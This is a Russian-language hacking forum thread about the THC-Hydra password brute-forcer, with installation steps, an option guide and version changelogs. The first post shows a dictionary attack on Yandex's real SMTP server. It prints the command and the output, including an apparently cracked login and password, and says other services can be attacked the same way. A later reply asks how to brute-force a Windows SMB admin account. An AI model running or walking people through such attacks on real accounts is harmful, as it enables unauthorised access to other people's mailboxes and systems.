Старый 11.04.2011, 14:16   #1
mironich
RAM 256MB
 
Аватар для mironich
 
Регистрация: 22.11.2010
Сообщений: 2,026
mironich - просто великолепная личностьmironich - просто великолепная личностьmironich - просто великолепная личностьmironich - просто великолепная личностьmironich - просто великолепная личностьmironich - просто великолепная личностьmironich - просто великолепная личностьmironich - просто великолепная личность
mironich вне форума

По умолчанию THC-Hydra


Что такое hydra?
Это очень быстрый кросплатформенный брут, поддерживающий кучу протоколов.
TELNET, FTP, HTTP, HTTPS, HTTP-PROXY, SMB, SMBNT, MS-SQL, MYSQL, REXEC, irc,
RSH, RLOGIN, CVS, SNMP, SMTP, SOCKS5, VNC, POP3, IMAP, NNTP, PCNFS, XMPP,
ICQ, SAP/R3, LDAP2, LDAP3, Postgres, Teamspeak, Cisco auth, Cisco enable,
AFP, Subversion/SVN, Firebird, LDAP2, Cisco AAA (включены в модуль Telnet).
For HTTP, POP3, IMAP and SMTP, поддерживается несколько механизмов входа MD5 поддерживается.
Чейнжлог версии 6.2

Код:
* Добавлен патч Яна Dlabalа который добавляет генератор паролей.
         * Новый модуль: XMPP с TLS переговоров и логин, обычная, CRAM-MD5, DIGEST-MD5, SCRAM-SHA1 поддерживается.
         * Новый модуль: IRC не умер!
         * Добавлен ман для Debian 
         * Добавлена ***8203;***8203;поддержка нового синтаксиса:
             ://[:][/]
         * Добавлена TLS поддержка SIP
         * Добавлен Scram-SHA1 авторизации для модуля IMAP
         * Добавлен модуль поможет в использование (-U)
         * Добавлена ***8203;***8203;поддержка RFC 4013: интернационализированных строк в SASL ("SASLPrep")
         * Добавить SASL + TLS поддержка NNTP
         * Добавлена ***8203;***8203;поддержка CRAM-MD5 и DIGEST-MD5 авторизации на LDAP модуля
         * Добавлена ***8203;***8203;поддержка для Scram-SHA1 (RFC 5802).
         * Добавлена TLS negotiation подддерживает SMTP-авторизацию, POP3, IMAP, FTP и LDAP
         * Переименован SMTPAUTH модуль для SMTP
         * Забыли переименовать ssh2 к SSH в xhydra, фиксировано.
         * Багфикс ***8203;***8203;ошибки SASL PLAIN аутентификации 
         * Багфикс SASL DIGEST-MD5, ответ может быть неправильным на 64-битных системах
         * Багфикс Rlogin и RSH модуля
         * Добавлена SSL поддержка VMware Authentication Daemon module
         * Исправление CVS модуль
         * Багфикс для Telnet модуля
Установка в Ubuntu скачиваем последнюю версию [Ссылки доступны только зарегистрированным пользователям . Зарегистрируйся, чтобы увидеть ссылку.]
Распаковуем допустим в /home/hydra/hydra-5.9.1-src/
Запускаем терминал.
Пишем
Код:
cd /home/hydra/hydra-5.9.1-src/
Затем
Код:
sh configure
Потом
Код:
sudo make install
Установка GUI
Код:
cd /home/hydra/hydra-5.9.1-src/hydra-gtk
Затем
Код:
sh configure
Потом
Код:
sudo make install
Запускается гуй командой
Код:
xhydra
.
Gui есть толко в *nix версии

Небольшой faq.
В общем лучше глянуть введя в терминале hydra -h но если у вас туго с инглишом то смотрите сюда.
Синтаксис: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e ns]
[-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-f] [-s PORT] [-S] [-vV]
ДЕМОН на сервере [OPT]

Опции:
-R Восстанавливает убитую\утеряную сессию.
-s PORT В общем если сервис висит вне стандартного порта то надо указать это гидре ткнув ее носом и вписать порт сюда.
-l Внимательно маленькая -l означает перебор по одному логину большая же -L означает что мы брутим по списку логинов нужно точно указать путь к словарику с логинами
-p COLOR="red"]Внимательно[/COLOR] маленькая -р означает перебор по одному паролю а Большая -Р по нескольким паролям из списка в файле точно указать путь к словарику с логинами
-e ns Тут все просто если ставим n если брутим без пасса s если с ним.
-C FILE colon seperated "login:pass" format, instead of -L/-P options
-M FILE Лист серверов для поралельной атаки на одной линии должно быть не больше одного сервера
пример 123.0.0.0
123.6.8.8
-o FILE Если эта опция включена то гуды будут вписыватся в файл вместо стандартного вывода в консоли необходимо чотко указать путь к файлу в который будет ити запись
-f Завершение работы программы после первого же нахождения удачной комбинации логина\пароля, (если стоит флаг -M то при первом подборе к хосту из списка(тут я не уверен))
-t Короче запускать задания паролельно (По дефолту: 16) чтото вроде потоков
-w Тайм аут ожидания ответа (по дефолту : 30)
-v / -V Расширеный режим / Показать каждую попытку подбора комбинации логина\пасса
server Целевой сервер в общем его адрес (Юзается если не стоит -M флаг)
service Сервис\демон для взлома. Поддерживаемые протоколы: telnet ftp pop3[-ntlm] imap[-ntlm] smb smbnt http[s]-{head|get} http-{get|post}-form http-proxy cisco cisco-enable vnc ldap2 ldap3 mssql mysql oracle-listener postgres nntp socks5 rexec rlogin pcnfs snmp rsh cvs svn icq sapr3 ssh2 smtp-auth[-ntlm] pcanywhere teamspeak sip vmauthd firebird ncp afp
[COLOR="rgb(245, 222, 179)"]Теперь разсмотрим на примере брут по smtp яндекса[/COLOR].
Вводим команду
Код:
hydra -L /home/mironich/login.txt -P /home/mironich/pass.txt  smtp.yandex.ru smtp-auth
важно написать именно smtp-auth а не смтп ибо выдаст ошибку.
Код:
mironich@mironich-Pk:/$ hydra -L /home/mironich/login.txt -P /home/mironich/pass.txt  smtp.yandex.ru smtp-auth
Hydra v5.9.1 (c) 2010 by van Hauser / THC - use allowed only for legal purposes.
Hydra (http://www.thc.org) starting at 2011-04-11 13:58:42
[DATA] 16 tasks, 1 servers, 30 login tries (l:6/p:5), ~1 tries per task
[DATA] attacking service smtp-auth on port 25
Error: SMTP AUTH LOGIN error: 535 5.7.8 Error: authentication failed: Invalid login or password

Error: SMTP AUTH LOGIN error: 535 5.7.8 Error: authentication failed: Invalid login or password

Error: SMTP AUTH LOGIN error: 535 5.7.8 Error: authentication failed: Invalid login or password

Error: SMTP AUTH LOGIN error: 535 5.7.8 Error: authentication failed: Invalid login or password

Error: SMTP AUTH LOGIN error: 535 5.7.8 Error: authentication failed: Invalid login or password

Error: SMTP AUTH LOGIN error: 535 5.7.8 Error: authentication failed: Invalid login or password

Error: SMTP AUTH LOGIN error: 535 5.7.8 Error: authentication failed: Invalid login or password

[STATUS] attack finished for smtp.yandex.ru (waiting for childs to finish)
Error: SMTP AUTH LOGIN error: 535 5.7.8 Error: authentication failed: Invalid login or password

[25][smtpauth] host: 87.250.250.38   login: Hjlt6658   password: Hjklopm
Вот пример брута по словарю, и сбрученая почта аналогично можно поступать с остальными сервисами.










[Ссылки доступны только зарегистрированным пользователям . Зарегистрируйся, чтобы увидеть ссылку.]
  Ответить с цитированием
Последний раз редактировалось mironich; 20.04.2011 в 22:19.
THC-Hydra 7.0
Старый 16.09.2011, 13:55   #2
mironich
RAM 256MB
 
Аватар для mironich
 
Регистрация: 22.11.2010
Сообщений: 2,026
mironich - просто великолепная личностьmironich - просто великолепная личностьmironich - просто великолепная личностьmironich - просто великолепная личностьmironich - просто великолепная личностьmironich - просто великолепная личностьmironich - просто великолепная личностьmironich - просто великолепная личность
mironich вне форума
По умолчанию THC-Hydra 7.0


Чейнджлог
* New main engine for hydra: better performance, flexibility and stability
* Новая опция -u - цикл по списку юзверей вместо цикла по пассам
* Новая опция -e теперь работает при флагах-x и -C
* Добавлен RDP модуль, в качестве аргумента может быть укеазан модуль
* Добавлена опция other_domain к smb модулю, для тестированния доверенных доменов
* Small enhancement for http and http-proxy module for standard ignoring servers
* Много багфиксов, с многопоточностью, при выборе нескольких целей и возстановлении файлов
* Исправлены несколько http-form запросов
* Исправлен smb модуль теперь юзается NTLM хэш
* Fixed Firebird module deprecated API call
* Исправлен dpl4hydra для работы на старых версиях (OS/X ...)
* Исправлен makefile для установки dpl4hydra (thx @sitecrea)
* Исправлено локальное переполнение буфера в выоде дебаггера фунция (required -d to be used)
* Исправлено xhydra предупреждение при работе и коректровано действие на событиии выхода
[Ссылки доступны только зарегистрированным пользователям . Зарегистрируйся, чтобы увидеть ссылку.] [Ссылки доступны только зарегистрированным пользователям . Зарегистрируйся, чтобы увидеть ссылку.]
  Ответить с цитированием
Ответ: THC-Hydra
Старый 12.02.2012, 10:38   #3
SeOqsss
RAM 16MB
 
Аватар для SeOqsss
 
Регистрация: 28.11.2011
Сообщений: 30
SeOqsss на пути к лучшему
SeOqsss вне форума
По умолчанию Ответ: THC-Hydra

Цитата:
кросплатформенный брут
На Windows довольно проблематично воткнуть,да и на Mandriva 2011 тоже есть свои нюансы в установки и баги в ходе работы,медуза лучше.
  Ответить с цитированием
Версия: 7.2
Старый 13.02.2012, 05:39   #4
mironich
RAM 256MB
 
Аватар для mironich
 
Регистрация: 22.11.2010
Сообщений: 2,026
mironich - просто великолепная личностьmironich - просто великолепная личностьmironich - просто великолепная личностьmironich - просто великолепная личностьmironich - просто великолепная личностьmironich - просто великолепная личностьmironich - просто великолепная личностьmironich - просто великолепная личность
mironich вне форума
По умолчанию Версия: 7.2

Чейнджлог:

* Speed-up http modules auth mechanism detection
* Fixed -C colonfile mode when empty login/passwords were used (thanks to
will(at)configitnow(dot)com for reporting)
* The -f switch was not working for postgres, afp, socks5, firebird and ncp,
thanks to Richard Whitcroft for reporting!
* Fixed NTLM auth in http-proxy/http-proxy-url module
* Fixed URL when being redirected in http-form module, thanks to gash(at)chaostreff(dot)at
* Fix MSSQL success login condition, thanks to whistle_master(at)live(dot)com
* Fix http form module: optional headers and 3xx status redirect, thx to Gash
* Fix in configure script for --prefix option, thanks to dazzlepod
* Update of the dpl4hydra script by Roland Kessler, thanks!
* Small fix for hydra man page, thanks to brad(at)comstyle(dot)com
[Ссылки доступны только зарегистрированным пользователям . Зарегистрируйся, чтобы увидеть ссылку.] [Ссылки доступны только зарегистрированным пользователям . Зарегистрируйся, чтобы увидеть ссылку.]
  Ответить с цитированием
Ответ: THC-Hydra
Старый 31.12.2013, 11:58   #5
2serg2
Юзверь
 
Аватар для 2serg2
 
Регистрация: 06.04.2010
Сообщений: 2
2serg2 Новичок
2serg2 вне форума
По умолчанию Ответ: THC-Hydra

Как сделать, чтобы Hydra 7.5 могла использовать логин Админ на русском языке? Протокол smb для брута Windows. Это возможно?
  Ответить с цитированием
Ответ

Метки
hydra, брут, брут, брут под linux, брут под линь, кросплотформеный брут, универсальный брут

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.



взломать аську аську взломать взлом программы сделать взлом программы как сделать взлом программы хакерские сайты как легко взломать аську лучшие хакерские сайты топ список хакерские сайты взлом паролей легкий взлом паролей

Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2009, Jelsoft Enterprises Ltd. Перевод: zCarot